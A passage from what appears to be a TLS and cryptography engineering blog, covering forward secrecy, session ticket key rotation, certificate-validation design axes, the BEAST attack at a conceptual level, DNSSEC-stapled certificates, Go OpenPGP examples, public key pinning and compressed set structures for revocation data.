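    private = secrets.randbelow(P - 3) + 2   # uniformly in [2, P - 2]
    public = pow(G, private, P)
    return private, public

def shared_secret(my_private, their_public):
    """Combine our private value with the peer's public value."""
    return pow(their_public, my_private, P)

def run_session():
    """Simulate one handshake; both sides must arrive at the same secret."""
    server_private, server_public = ephemeral_keypair()
    client_private, client_public = ephemeral_keypair()
    server_view = shared_secret(server_private, client_public)
    client_view = shared_secret(client_private, server_public)
    assert server_view == client_view
    return client_view

# Each session draws new private values, so recovering one session's secret
# says nothing about any other session.
print(hex(run_session()))
print(hex(run_session()))
```

Because the private values are discarded after the handshake, there is nothing long-lived for an attacker to steal later that would unlock recorded sessions.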

While working on this, Bodo Möller, Emilia Kasper and I wrote fast, constant-time implementations of P-224, P-256 and P-521 for OpenSSL. This work has been open-sourced and submitted upstream to OpenSSL. We also fixed several bugs in OpenSSL's ECDHE handling during deployment and those bug fixes are in OpenSSL 1.0.0e.

Session Tickets

The second part of forward secrecy is dealing with TLS session tickets.

Session tickets allow a client to resume a previous session without requiring that the server maintain any state. When a new session is established the server encrypts the state of the session and sends it back to the client, in a session ticket. Later, the client can echo that encrypted session ticket back to the server to resume the session.

Since the session ticket contains the state of the session, and thus keys that can decrypt the session, it too must be protected by ephemeral keys. But, in order for session resumption to be effective, the keys protecting the session ticket have to be kept around for a certain amount of time: the idea of session resumption is that you can resume the session in the future, and you can't do that if the server can't decrypt the ticket!

So the ephemeral, session ticket keys have to be distributed to all the frontend machines, without being written to any kind of persistent storage, and frequently rotated.
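The rotation logic can be sketched as follows. This is not a description of Google's frontends: the class name, the `keep` parameter and the ticket layout are all hypothetical, and because the Python standard library has no authenticated encryption the sketch only authenticates the session state with HMAC, where a real ticket would also encrypt it.

```python
import hashlib
import hmac
import secrets
from collections import OrderedDict

class TicketKeyRing:
    """Keeps ticket keys in memory only. The newest key seals new tickets;
    older keys can still open tickets until they are rotated away."""

    def __init__(self, keep=2):
        self.keep = keep             # number of keys (newest included) kept usable
        self.keys = OrderedDict()    # key name -> key bytes, oldest first
        self.rotate()

    def rotate(self):
        """Add a fresh key and forget the oldest ones."""
        self.keys[secrets.token_bytes(16)] = secrets.token_bytes(32)
        while len(self.keys) > self.keep:
            self.keys.popitem(last=False)

    def seal(self, state: bytes) -> bytes:
        """Produce a ticket: key name, HMAC tag, then the (unencrypted) state."""
        name, key = next(reversed(self.keys.items()))
        tag = hmac.new(key, name + state, hashlib.sha256).digest()
        return name + tag + state

    def open(self, ticket: bytes):
        """Return the state, or None if the key is gone or the tag is wrong."""
        name, tag, state = ticket[:16], ticket[16:48], ticket[48:]
        key = self.keys.get(name)
        if key is None:
            return None              # key rotated away: do a full handshake
        expected = hmac.new(key, name + state, hashlib.sha256).digest()
        return state if hmac.compare_digest(tag, expected) else None
```

Once a key has been dropped from the ring, tickets sealed under it can no longer be opened by anyone, which is the property that forward secrecy needs.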

Result

We believe that forward secrecy provides a fairly significant benefit to our users and we've contributed our work back to OpenSSL in the hope that others will make use of it.

Classifying solutions to the certificate problem

This is something that I wrote up internally, but which Chris Palmer suggested would be useful to post publicly for reference. It presents some, somewhat artificial, axes along which I believe that all proposed solutions to the weaknesses in the current certificate ecosystem fall. By dividing the problem into those decisions, I hope to make the better solutions clearer.

Axis 1: Private vs public signing

At the moment we have private signing. A CA can sign a certificate and tell nobody about it and the certificate is still valid. This is the reason that we have to go crawl the Internet in order to figure out how many intermediate CA certs there are.

In public signing, certificates aren't valid unless they're public.

There are degrees of how public schemes are. Convergence is a public scheme: certificates have to be visible to the notaries, but it's a lot less public than a scheme where all certificates have to be published. And published where? Highly public schemes imply some centralisation.

Private schemes don't protect us from CAs acting in bad faith or CAs which have been compromised. Public schemes help a lot in these cases, increasingly so the more public they are. Although a certificate might be valid for a short time, evidence of misbehavior is recorded. Public schemes also allow each domain to monitor all the certificates for their domain. Fundamentally, the only entity that can answer the question of whether a certificate is legitimate is the subject of the certificate itself. (See this tale of a Facebook certificate.)

Private schemes have the advantage of protecting the details of internal networks (i.e. not leaking the name www.corp.example.com).

Axis 2: Side channels or not

Revocation checking which calls back to the CA is a side channel. Convergence notaries are too. OCSP stapling is not, because the server provides the client with everything that it needs (assuming that OCSP stapling worked).

Side channels which need to be a hard fail are a problem: it's why revocation checking doesn't actually work. Private networks, hotel networks and server downtime are the issues. Side-channels are also a privacy and performance concern. But they're easier on the server operator and so more likely to be deployed.

In the middle are soft-fail side-channels. These offer limited protection because the connection proceeds even when the side-channel fails. They often queue the certificate up for later reporting.

Axis 3: Clocks or not

OCSP with nonces doesn't need clock sync. OCSP with time stamps does.

Keeping clocks in sync is a problem in itself, but it allows for short lived statements to be cached. It can also be a useful security advantage: Nonces require that a signing key be online because it has to sign a constant stream of requests. With clocks, a single response can be served up repeatedly and the key kept largely off-line. That moves the online key problem to the clock servers, but that's a smaller problem. A compromised clock server key can be handled by querying several concurrently and picking the largest cluster of values.
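As a rough sketch of "querying several concurrently and picking the largest cluster", the following groups the reported times and takes a value from the biggest group. The function names and the `tolerance` parameter are hypothetical, and the network queries themselves are left out.

```python
def largest_cluster(timestamps, tolerance):
    """Return the largest group of timestamps that all lie within
    `tolerance` seconds of each other (sliding window over sorted values)."""
    ordered = sorted(timestamps)
    best = []
    start = 0
    for end, value in enumerate(ordered):
        # Shrink the window until its span fits inside the tolerance.
        while value - ordered[start] > tolerance:
            start += 1
        if end - start + 1 > len(best):
            best = ordered[start:end + 1]
    return best

def agreed_time(timestamps, tolerance=5.0):
    """Pick a middle value of the largest cluster as the agreed time."""
    if not timestamps:
        raise ValueError("need at least one clock response")
    cluster = largest_cluster(timestamps, tolerance)
    return cluster[len(cluster) // 2]

# One server (5000.0) is compromised or badly wrong; it is simply outvoted.
responses = [1000.0, 1001.5, 999.0, 5000.0, 1002.0]
print(agreed_time(responses))
```

A single bad clock server cannot move the result unless it can also outnumber the honest ones.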

Examples

OCSP today is {private,side-channel,clock}. The 'let's fix OCSP' solutions are typically {private,side-channel,no-clock} (with an option for no-side-channel). Convergence is {mostly-public,side-channel,no-clock}.

I think the answer lies with {public,no-side-channel,clock}, but it's a trek to get there. Maybe something for a future post.

False Start: Brocade broken again

I wrote previously that Brocade had released a firmware update for their ServerIron SSL terminators which fixed an incompatibility with False Start. However, it now appears that they didn't fix the underlying issue, rather they special cased Chrome's current behaviour.

Sadly, due to Chrome implementing a workaround for the BEAST attack, their special casing doesn't work anymore and breaks Chrome 15.

So, if you run a Brocade ServerIron you should contact me ASAP. I'll be adding sites running this hardware to the False Start blacklist for Chrome 15 to allow Brocade to release another firmware update.

Chrome and the BEAST

Thai Duong and Juliano Rizzo today demoed an attack against TLS 1.0's use of cipher block chaining (CBC) in a browser environment. The authors contacted browser vendors several months ago about this and so, in order not to preempt their demo, I haven't discussed any details until now.

Contrary to several press reports, Duong and Rizzo have not found, nor do they claim, any new flaws in TLS. They have shown a concrete proof of concept for a flaw in CBC that, sadly, has a long history. Early reports of the problem date back nearly ten years and Bard published two papers detailing the problem.

The problem has been fixed in TLS 1.1 and a workaround for SSL 3.0 and TLS 1.0 is known, so why is this still an issue?

The workaround (prepending empty application data records) is perfectly valid according to the protocol but several buggy implementations of SSL/TLS misbehaved when it was enabled. After Duong and Rizzo notified us, we put the same workaround back into Chrome to see if the state of the Internet had improved in the years since the last attempt. Sadly it was still infeasible to implement this workaround and the change had to be reverted.

Use of TLS 1.1 would also have solved the issue but, despite it being published in 2006, common SSL/TLS libraries still don't implement it. But even if there were widespread deployment of TLS 1.1, it wouldn't have helped avoid problems like this. Due to a different, common bug in SSL 3.0 implementations (nearly 12 years after SSL 3.0 was obsoleted by TLS 1.0), browsers still have to perform SSL 3.0 downgrades to support buggy servers. So even with a TLS 1.1 capable browser and server, an attacker can trigger a downgrade to SSL 3.0 and bypass the protections of TLS 1.1.

Finally, the CBC attacks were believed to be largely theoretical but, as Duong and Rizzo have pointed out today, that's no longer the case.

Initially the authors identified HTML5 WebSockets as a viable method of exploiting the CBC weakness but, due to unrelated reasons, the WebSockets protocol was already in the process of changing in such a way that stopped it. The new WebSockets protocol shipped with Chrome 14 but several plugins have been found to offer features that might allow the attack to be performed.

Duong and Rizzo confirmed that the Java plugin can be used, but Chrome already blocks the execution of Java by default. Other plugins, if installed, can be disabled on the about:plugins page if the user wishes.

The attack is still a difficult one; the attacker has to have high-bandwidth MITM access to the victim. This is typically achieved by being on the same wireless network as the victim. None the less, it's a much less serious issue than a problem which can be exploited by having the victim merely visit a webpage. (Incidentally, we pushed out a fix to all Chrome users for such a Flash bug only a few days ago.)

Also, an attacker with MITM abilities doesn't need to implement this complex attack. SSL stripping and mixed-scripting issues are much easier to exploit and will take continued, sustained effort to address. Duong and Rizzo have highlighted this fact by choosing to attack one of the few HSTS sites.

Thanks to an idea suggested by Xuelei Fan, we have another workaround for the problem which will, hopefully, cause fewer incompatibility problems. This workaround is currently being tested on the Chrome dev and beta channels but we haven't pushed it on the stable channel yet. Since we don't really know if the fix will cause problems it's not something that we want to drop on people without testing. The benefit of a fix to Chrome's TLS stack is also limited as Chrome already uses the newer WebSockets protocol and it doesn't fix problems in plugins.

If it turns out that we've misjudged something we can quickly react, thanks to Chrome's auto-update mechanism.

It's also worth noting that Google's servers aren't vulnerable to this problem. In part due to CBC's history, Google servers have long preferred RC4, a cipher that doesn't involve CBC mode. Mention has also been made of Chrome's False Start feature but, since we don't believe that there are any vectors using Chrome's stack, that's immaterial.

DNSSEC Certificates now in Chrome Stable

A few months back I described DNSSEC authenticated HTTPS in Chrome. This allows sites to use DNSSEC, rather than traditional, certificates and is aimed at sites which currently use no HTTPS, or self-signed certificates. Since Chrome 14 is now stable, all Chrome users now have this experimental feature.

(Also, the serialisation format has been documented.)

Why not Convergence?

In light of recent events, I've had several requests to implement Convergence in Chrome. For those who don't know and, frankly, for anyone interested in SSL, I highly recommend watching Moxie's talk on the subject from this year's Black Hat. You can also check out the project website.

Moxie, having actually thought about the issue and coded something up, has already done a thousand times more to address the problem than almost anyone else. But I don't think that Convergence is something we would add in Chrome:

Although the idea of trust agility is great, 99.99% of Chrome users would never change the default settings. (The percentage is not an exaggeration.) Indeed, I don't believe that an option for setting custom notaries would even meet the standards for inclusion in the preferences UI.

Given that essentially the whole population of Chrome users would use the default notary settings, those notaries will get a large amount of traffic. Also, we have a very strong interest for the notaries to function, otherwise Chrome stops working. Combined, that means that Google would end up running the notaries. So the design boils down to Chrome phoning home for certificate validation. That has both unacceptable privacy implications and very high uptime requirements on the notary service.

It also doesn't address the two problems that Moxie highlights: internal servers and captive portals. It's not clear how either would work in this design, at least without giving up on security and asking the user. (These two problems, captive portals especially, are the bane of many an idea in this area.)

None of the above argues against allowing Convergence as an extension for those who wish to run it. We don't currently have an extension API for controlling certificate decisions and I'm not inherently opposed to one. It would be additional complexity and something that we would have to support in the future, so it's not without costs, but mostly it's not there because nobody has written it and I'm afraid that I don't have any plans to do so.

False Start: past time to fix your servers

A year ago I wrote about False Start in Chrome. In short: Chrome cuts the TLS handshake short to save a round trip in a full handshake. Since then we've posted results that show a 30% drop in SSL handshake latency.

When we enabled False Start by default in Chrome, we also included a list of the very small number of incompatible sites. This list was built into the browser in order to avoid breaking these sites. (See the original post for the reasoning.)

For some time I've been randomly eliminating chunks of that list. Mostly it's been the case that sites have already upgraded. I don't think that they did so specifically with False Start in mind, but that it was just regular maintenance.

But it's now time that all sites are updated because the list is fading away fast:

  • If you run A10 SSL terminators, ensure that you have firmware >= 2.4.3-p4
  • If you run Brocade SSL terminators, ensure that you have firmware >= 10.2.01y
  • If you run F5 SSL terminators, you need to be running the native SSL stack (which is the default, as opposed to the 'compat' stack)
  • If you run FTMG SSL terminators, you need Service Pack 2

DNSSEC authenticated HTTPS in Chrome

Update: this has been removed from Chrome due to lack of use.

DNSSEC validation of HTTPS sites has been hanging around in Chrome for nearly a year now. But it's now enabled by default in the current canary and dev channels of Chrome and is on schedule to go stable with Chrome 14. If you're running a canary or dev channel (and you need today's dev channel release: 14.0.794.0) then you can go to https://dnssec.imperialviolet.org and see a DNSSEC signed site in action.

DNSSEC stapled certificates (and the reason that I use that phrase will become clear in a minute) are aimed at sites that currently have, or would use, self-signed certificates and, possibly, larger organisations that are Chrome based and want certificates for internal sites without having to bother with installing a custom root CA on all the client devices. Suggesting that this heralds the end of the CA system would be utterly inaccurate. Given the deployed base of software, all non-trivial sites will continue to use CA signed certificates for decades, at least. DNSSEC signing is just a gateway drug to better transport security.

I'm also going to see how it goes for a while. The most likely outcome is that nobody uses them and I pull the code out in another year's time. There are also some risks:

In theory, it should be hard to get a CA certificate for, say, paypa1.com (note the digit 1 in there). The CA should detect a phishing attempt and deny the certificate. With DNSSEC, there's no such filtering and a phisher could get a green padlock on any site that they can get a DNS name for. It's not clear whether this filtering is actually enforced by all public CAs, nor that phishing is more effective over HTTPS. Additionally, Chrome has anti-phishing warnings built in which is a better layer at which to handle this problem.

In the end, if you want a certificate that identifies a legal entity, rather than a domain name, then you want EV certificates. None the less, if DNSSEC stapled certificates end up being predominantly used for abuse then I'll probably kill them.

It's also possible that lots of sites will use these certificates, triggering warnings in other browsers thus further desensitising those users to such warnings. But that's one of those “good to have” problems and, in this very unlikely situation, there will have to be a push to add wider support.

For site operators

For site operators it's not just a question of dropping in a DNS record and forgetting about it (although nearly). The DNSSEC chain has to be embedded in the certificate and the certificate has to be refreshed, probably in a nightly cron job.

This is why I used the phrase “DNSSEC stapled certificate” above. These certificates are self-signed X.509 certificates with a DNSSEC chain embedded in an extension. The alternative would be to have the client perform a DNSSEC lookup itself. In the long term this may be the answer but, for now, client platforms don't support DNSSEC resolution and I'm in no rush to drop a DNSSEC resolving library into Chrome. We also have data that suggests that ~1% of Chrome (Linux) users can't resolve arbitrary DNS record types (because of ‘hotel networks’, firewalls etc). Finally, having the client do a lookup is slower. Since DNSSEC data is signed it doesn't matter how you get it, so having the server do the work and cache the result is simpler, faster and more dependable.

The DNSSEC stapled data is embedded in an X.509 certificate (as opposed to extending TLS or using a different certificate format) because every HTTPS server will take an X.509 certificate as an opaque blob and it Just Works. All the other possibilities introduce significant barriers to adoption.

You should also keep in mind that the format of the DNS record may change in the future. I've no current plans to change it but these things are still working themselves out.

Setting it up

First you need a zone that's DNSSEC signed. Setting that up is a little beyond the scope of this blog post but I use BIND with auto-signing as a server and DynDNS as a registrar.

Second, you need to clone git://github.com/agl/dnssec-tls-tools.git.

$ openssl genrsa 1024 > privkey.pem
$ openssl rsa -pubout -in privkey.pem > pubkey.pem
$ python ./gencaa.py pubkey.pem
EXAMPLE.COM. 60 IN TYPE257 \# 70 020461757468303e3039060a2b06010401d6790203010…

Take the DNS record that's printed out by gencaa.py, change the domain name (and possibly the TTL) and add it to your zone. If you need to do anything else to make the record accessible to the world, do that now. You should be able to see the record with dig -t type257 example.com.

Now we get the DNSSEC chain and create a certificate with it embedded:

$ python ./chain.py example.com chain
$ gcc -o gencert gencert.c -Wall -lcrypto
$ ./gencert privkey.pem chain > cert.pem

You can check the certificate with openssl x509 -text < cert.pem | less.

CNAMEs should work but I haven't implemented DNS wildcards. Also, that code was written to run easily (hence C and Python) rather than being nice code that's going to handle lots of edge cases well. chain.py is just shelling out to dig :)

You now have a key pair (privkey.pem and cert.pem) that can be used by any HTTPS server in the usual way. Keep in mind that DNSSEC signatures expire, often on the order of a week. So you'll need to set up a cron job to download the chain, rebuild the certificate and HUP the HTTPS server.
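The refresh job could look something like the sketch below, which a cron entry would run nightly. It simply replays the chain.py and gencert commands from above; the function names, the temporary file name and the way the server's process ID is supplied are all hypothetical, and error handling is minimal.

```python
import os
import signal
import subprocess

def refresh_commands(domain, key="privkey.pem", chain="chain"):
    """The two commands from the setup steps, in the order they must run."""
    return [
        ["python", "./chain.py", domain, chain],   # fetch the DNSSEC chain
        ["./gencert", key, chain],                 # emit the certificate on stdout
    ]

def refresh(domain, server_pid, cert="cert.pem"):
    """Rebuild the certificate and tell the HTTPS server to reload it.
    `server_pid` is assumed to come from the server's PID file."""
    fetch_chain, build_cert = refresh_commands(domain)
    subprocess.run(fetch_chain, check=True)
    tmp = cert + ".new"
    with open(tmp, "wb") as out:
        subprocess.run(build_cert, check=True, stdout=out)
    os.replace(tmp, cert)                 # swap the new certificate in atomically
    os.kill(server_pid, signal.SIGHUP)    # HUP the HTTPS server (Unix only)
```

Writing to a temporary file first means that a failed run leaves the previous, still valid certificate in place.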

OpenPGP support in Go

Go is currently my favourite programming language for recreational programming. Mentioning Go appears to send some people into a rage judging by the sort of comments that arise on Hacker News, proggit and so on but, thankfully, this blog doesn't have comments.

Over the past few months I've been (very) slowly building OpenPGP support into Go's crypto library. (You can get my key, DNSSEC signed, via PKA: dig +dnssec -t txt agl._pka.imperialviolet.org). I don't get to use PGP often enough but, even when I have (I used to run an email verifying auto-signer), I've resorted to shelling out to gpg. I understand that GPG's support for acting as a library has improved considerably since then, but half the aim of this is that it's recreational programming.

So, here's a complete Go program using the OpenPGP library: (Note, if you wish to compile these programs you'll need a tip-of-tree Go)

package main

import (
  "crypto/openpgp"
  "crypto/openpgp/armor"
  "fmt"
  "os"
)

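func main() {
  // Errors are ignored throughout to keep the example short.
  // Wrap stdout in an ASCII-armor encoder.
  w, _ := armor.Encode(os.Stdout, "PGP MESSAGE", nil)
  // Anything written to plaintext is encrypted with the passphrase and sent to w.
  plaintext, _ := openpgp.SymmetricallyEncrypt(w, []byte("golang"), nil)
  fmt.Fprintf(plaintext, "Hello from golang.\n")
  // Close the inner stream first so its final packets are written before the armor footer.
  plaintext.Close()
  w.Close()
  fmt.Print("\n")
}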

It'll output a symmetrically encrypted message, like this:

-----BEGIN PGP MESSAGE-----

wx4EBwMCkdZyiLAEewZgIuDNFqo0FBYNp4ZGpaiaAjHS4AHkLcerCkW9sCqLdBQc
GH6HUOEwZeCr4ILhUBHgnOID5zAh4PDkdVSUDxFj0KITDfgDXMptL+Ai4aTL4Mzg
4uCX5C7gKEnS8gsxdwC67zQzUMbiSS92duG39AA=
=NuOw
-----END PGP MESSAGE-----

You can feed that into gpg -d and decrypt with the passphrase golang if you like. Since all the APIs are stream based you can process arbitrary length messages without having to fit them into memory.

We can also do public key stuff:

package main

import (
  "crypto/openpgp"
  "crypto/openpgp/armor"
  "fmt"
  "os"
)

func getKeyByEmail(keyring openpgp.EntityList, email string) *openpgp.Entity {
  for _, entity := range keyring {
    for _, ident := range entity.Identities {
      if ident.UserId.Email == email {
        return entity
      }
    }
  }

  return nil
}

func main() {
  // Errors are ignored throughout to keep the example short.
  // Load the public and secret keyrings from the current directory.
  pubringFile, _ := os.Open("pubring.gpg")
  pubring, _ := openpgp.ReadKeyRing(pubringFile)
  privringFile, _ := os.Open("secring.gpg")
  privring, _ := openpgp.ReadKeyRing(privringFile)

  // Look up the signer and the recipient by email address.
  myPrivateKey := getKeyByEmail(privring, "me@mydomain.com")
  theirPublicKey := getKeyByEmail(pubring, "bob@example.com")

  w, _ := armor.Encode(os.Stdout, "PGP MESSAGE", nil)
  // Encrypt to their public key and sign with my private key.
  plaintext, _ := openpgp.Encrypt(w, []*openpgp.Entity{theirPublicKey}, myPrivateKey, nil)
  fmt.Fprintf(plaintext, "Hello from golang.\n")
  plaintext.Close()
  w.Close()
  fmt.Printf("\n")
}

And, of course, it can also decrypt those messages, check signatures etc. The missing bits are ElGamal encryption, support for clearsigning and big bits of functionality around web-of-trust, manipulating keys etc. None the less, Camlistore is already using it and it appears to be working for them.

Public key pinning

Starting with Chrome 13, we'll have HTTPS pins for most Google properties. This means that certificate chains for, say, https://www.google.com, must include a whitelisted public key. It's a fatal error otherwise. Credit goes to my colleague, Chris Evans, for much of this.

The whitelisted public keys for Google currently include Verisign, Google Internet Authority, Equifax and GeoTrust. Thus Chrome will not accept certificates for Google properties from other CAs. As ever, you can look at the source if you wish (search that file for "Verisign"). DigiCert also issues some of our certificates, but we aren't yet enforcing pinning for those domains.

This works with HSTS preloading of Google properties to ensure that, when a user types gmail.com into the address bar, they only get the real Gmail, no matter how hostile the network.

What about MITM proxies, Fiddler etc?

There are a number of cases where HTTPS connections are intercepted by using local, ephemeral certificates. These certificates are signed by a root certificate that has to be manually installed on the client. Corporate MITM proxies may do this, several anti-virus/parental control products do this and debugging tools like Fiddler can also do this. Since we cannot break in these situations, user installed root CAs are given the authority to override pins. We don't believe that there will be any incompatibility issues.
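The policy described above boils down to a small decision, sketched here. This is not Chrome's code: the function name and arguments are hypothetical, and the hashes are treated as opaque strings.

```python
def chain_satisfies_pins(chain_key_hashes, pinned_hashes, root_is_user_installed):
    """Decide whether a validated certificate chain is acceptable for a pinned site.

    chain_key_hashes: hashes of the public keys in the chain, leaf to root.
    pinned_hashes: the whitelisted public key hashes for the site.
    root_is_user_installed: True if the chain ends at a manually installed root.
    """
    if root_is_user_installed:
        # Local MITM proxies, anti-virus products and debugging tools
        # are allowed to override pins.
        return True
    # Otherwise at least one key in the chain must be whitelisted.
    return any(h in pinned_hashes for h in chain_key_hashes)

pins = {"hash-of-pinned-ca-key"}
print(chain_satisfies_pins(["leaf", "hash-of-pinned-ca-key"], pins, False))
print(chain_satisfies_pins(["leaf", "some-other-ca"], pins, False))
print(chain_satisfies_pins(["leaf", "corp-proxy-root"], pins, True))
```

Only the second case, a chain from a public CA that isn't on the whitelist, is a fatal error.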

Why public key hashes, not certificate hashes?

In general, hashing certificates is the obvious solution, but the wrong one. The problem is that CA certificates are often reissued: there are multiple certificates with the same public key, subject name etc but different extensions or expiry dates. Browsers build certificate chains from a pool of certificates, bottom up, and an alternative version of a certificate might be substituted for the one that you expect.

For example, StartSSL has two root certificates: one signed with SHA1 and the other with SHA256. If you wished to pin to StartSSL as your CA, which certificate hash would you use? You would have to use both, but how would you know about the other root if I hadn't just told you?

Conversely, public key hashes must be correct:

Browsers assume that the leaf certificate is fixed: it's always the starting point of the chain. The leaf certificate contains a signature which must be a valid signature, from its parent, for that certificate. That implies that the public key of the parent is fixed by the leaf certificate. So, inductively, the chain of public keys is fixed, modulo truncation.

The only sharp edge is that you mustn't pin to a cross-certifying root. For example, GoDaddy's root is signed by Valicert so that older clients, which don't recognise GoDaddy as a root, still trust those certificates. However, you wouldn't want to pin to Valicert because newer clients will stop their chain at GoDaddy.

Also, we're hashing the SubjectPublicKeyInfo not the public key bit string. The SPKI includes the type of the public key and some parameters along with the public key itself. This is important because just hashing the public key leaves one open to misinterpretation attacks. Consider a Diffie-Hellman public key: if one only hashes the public key, not the full SPKI, then an attacker can use the same public key but make the client interpret it in a different group. Likewise one could force an RSA key to be interpreted as a DSA key etc.
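A small sketch shows why the hash has to cover the whole SPKI. The assumptions are stated loudly: the byte strings below are readable placeholders rather than real DER encodings, and SHA-256 with base64 output is an arbitrary choice for illustration, since nothing above says which hash function is used.

```python
import base64
import hashlib

def pin(data: bytes) -> str:
    """Hash some bytes and encode the digest for display (assumed format)."""
    return base64.b64encode(hashlib.sha256(data).digest()).decode("ascii")

# Placeholder for the raw public key bit string.
key_bits = bytes.fromhex("04" + "11" * 64)

# Two placeholder "SPKIs" wrapping the SAME key bits with different
# algorithm identifiers and parameters (not real DER).
spki_as_type_a = b"algorithm-A|params-1|" + key_bits
spki_as_type_b = b"algorithm-B|params-2|" + key_bits

# Hashing only the key bits cannot tell the two interpretations apart...
print(pin(key_bits))
# ...whereas hashing the full SPKI gives each interpretation its own pin.
print(pin(spki_as_type_a))
print(pin(spki_as_type_b))
```

A pin on the SPKI therefore commits to how the key is to be interpreted as well as to the key itself.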

(It's possible that a certificate could be reissued with a different SPKI for the same public key. That would be a second sharp edge but, to my knowledge, that has never happened. SPKIs for any public key type should have a distinguished encoding.)

Can I get this for my site?

If you run a large, high security site and want Chrome to include pins, let me know. For everyone else we hope to expose pinning via HSTS, although the details have yet to be worked out. You can experiment with pinning via the HSTS debug UI (chrome://net-internals/#hsts) if you have a new enough version of Chrome.

Smaller than Bloom filters

I've been looking at what would be needed in order to have a global view of CRLs in browsers. At the moment revocation has three problems: privacy (by asking the CA about the status of a certificate you're revealing to them what you're looking at), performance (OCSP checks take hundreds of milliseconds which adds up to thousands of milliseconds when subdomains are in play) and functionality (it doesn't work).

Having a global view of (nearly) all CRLs would mostly solve these issues. We could quickly determine that a certificate is good without leaking information and perform a hard fail revocation check if we believe that a certificate has been revoked. So that raises the question of how to get a global view of CRLs to the client. A Bloom filter would be the obvious choice since we can't accept false negatives (and a Bloom filter doesn't generate them) but we can cope with false positives (which it does produce).

But we really want to keep this structure small. Every extra KB has to be transferred to hundreds of millions of clients (including mobile devices) and takes up memory on each of those devices. We also have another trick to play: we don't care much about query time. For a normal Bloom filter, query time is very important but here, if it took several milliseconds, that would be ok.

Given those limitations we can look at data structures other than a traditional Bloom filter and which are smaller and slower.

An optimum Bloom filter takes up n·log₂(e)·log₂(1/p) bits (where p is the false positive probability and n is the number of inserted elements). You can't always hit that because you can't have a fraction of a hash function, but the theoretical lower bound is just n·log₂(1/p) bits, a factor of log₂(e)≅1.44 smaller. Other structures get closer to this bound.

First, there are compressed bloom filters[PDF]. The idea here is that one builds a larger Bloom filter with fewer hash functions and compresses it. In the paper they discuss compressing for transport, but I'm also thinking about it being compressed in memory. An interesting result from the paper is that the optimum number of hash functions for a normal Bloom filter is actually the worst case for a compressed filter.

The optimum number of hash functions for a compressed Bloom is one. Normally that would make the Bloom too large to deal with uncompressed, but if you're not actually going to store the uncompressed version, that's less of an issue.

A Bloom filter with a single hash function requires 1/p bits per element. From that, it's obvious that the density of the filter is p. So a perfect entropy coder (and a range coder is basically perfect) should be able to compress that to just n·(1/p)·H(p) bits, where H is the binary entropy. Now we can consider how close a compressed Bloom gets to the lower bound that we considered before.

A compressed Bloom takes (1/p)·H(p) bits per element and the lower bound is log₂(1/p). Here's a Wolfram Alpha plot of the expansion factor (the fractional overhead above the lower bound). The expansion factor goes from about 0.1 to 0.2 over a range of reasonable values of p. For p = 1/1024, it's 0.144. Remember that the expansion factor of a normal Bloom filter is 0.44, so that's quite a bit better.
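The figures above can be reproduced with a few lines of arithmetic. This is only a sketch: the function names are made up for illustration, and "expansion factor" is taken to mean the ratio to the lower bound, minus one.

```python
import math

def binary_entropy(p):
    """H(p), the entropy in bits of a coin that lands heads with probability p."""
    return -p * math.log2(p) - (1 - p) * math.log2(1 - p)

def bits_per_element(p):
    """Return (lower bound, optimum Bloom, compressed Bloom) in bits per element."""
    lower_bound = math.log2(1 / p)
    bloom = math.log2(math.e) * lower_bound
    compressed = binary_entropy(p) / p  # one hash function, 1/p bits per element
    return lower_bound, bloom, compressed

def expansion(p):
    """Fractional overhead above the lower bound for (Bloom, compressed Bloom)."""
    lower, bloom, compressed = bits_per_element(p)
    return bloom / lower - 1, compressed / lower - 1

if __name__ == "__main__":
    for k in (6, 8, 10, 12, 14):
        bloom_x, compressed_x = expansion(2.0 ** -k)
        print("p = 1/2^%d: Bloom %.3f, compressed Bloom %.3f" % (k, bloom_x, compressed_x))
```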

However, the uncompressed size, even if you're just streaming it, is a problem. For 400K revoked certificates with a 1 in 1024 false positive rate, you're looking at 51MB of uncompressed data. In order to process that you would have to call into the entropy coder 410 million times.

There's an obvious solution to this: split the Bloom into chunks and hash the input in order to find the correct chunk. That works fine, but there's also another answer which may be cleaner: Golomb Compressed Sets. (The idea was first mentioned in this paper, I believe.)

A GCS mirrors the structure of the compressed Bloom filter: we're hashing the elements into a space of size n/p. But, while a compressed Bloom filter treats this as a bitmap, a GCS treats it as a list of values. Since the values are the result of hashing, we can assume that they are uniformly distributed, sort them and build a list of differences. The differences will be geometrically distributed with a parameter of p. Golomb coding is the optimal encoding for geometrically distributed values: you divide by 1/p, encode that in unary then encode the remainder in binary.

A GCS is going to be slightly larger than a compressed bloom filter because the Golomb coding uses a whole number of bits for each value. I don't have an equation for the overhead, but I found it to be between 0.1 and 0.2 bits per set element, which is pretty minimal. It's also an advantage because it means that the user can index the GCS to any degree. With a chunked, compressed Bloom filter the generator has to decide on the chunking and also deal with the inefficiencies resulting from imperfect balance.
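To make the construction concrete, here is a minimal sketch of building and querying a GCS. It is not the code mentioned later in this post. It assumes p is a power of two (so the Golomb code reduces to a Rice code), uses SHA-256 as the hash, and keeps the output as a string of '0' and '1' characters rather than packed bits so that the encoding is easy to read. All of the function names are hypothetical.

```python
import hashlib

def hash_to_range(item: bytes, space: int) -> int:
    """Hash an item to a (roughly) uniform integer in [0, space)."""
    digest = hashlib.sha256(item).digest()
    return int.from_bytes(digest[:8], "big") % space

def gcs_build(items, p_bits):
    """Return (n, bits) for a set with false positive rate 2**-p_bits."""
    n = len(items)
    space = n << p_bits  # a space of size n/p
    values = sorted({hash_to_range(item, space) for item in items})
    out = []
    previous = 0
    for value in values:
        delta = value - previous
        previous = value
        quotient = delta >> p_bits
        remainder = delta & ((1 << p_bits) - 1)
        out.append("1" * quotient + "0")                       # quotient in unary
        out.append(format(remainder, "0{}b".format(p_bits)))   # remainder in binary
    return n, "".join(out)

def gcs_contains(n, bits, p_bits, item):
    """Walk the list of differences until we reach or pass the target value."""
    if n == 0:
        return False
    target = hash_to_range(item, n << p_bits)
    position = 0
    value = 0
    while position < len(bits):
        quotient = 0
        while bits[position] == "1":
            quotient += 1
            position += 1
        position += 1  # skip the '0' that terminates the unary part
        remainder = int(bits[position:position + p_bits], 2)
        position += p_bits
        value += (quotient << p_bits) | remainder
        if value == target:
            return True
        if value > target:
            return False
    return False
```

A query has to decode from the start here. An index of (value, bit offset) pairs at whatever spacing the client likes would let it jump into the middle, which is the "index the GCS to any degree" property mentioned above.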

But what about that lower bound, can anything hit it? Yes, matrix filters (paper). The idea here is that you hash elements into n values of a finite field. Then, from n such elements you have an n by n matrix where the rows are independent with very high probability. You then perform Gaussian elimination to solve M·b = 1 (where M is the matrix, b is an n column vector and 1 is an n column vector of ones).

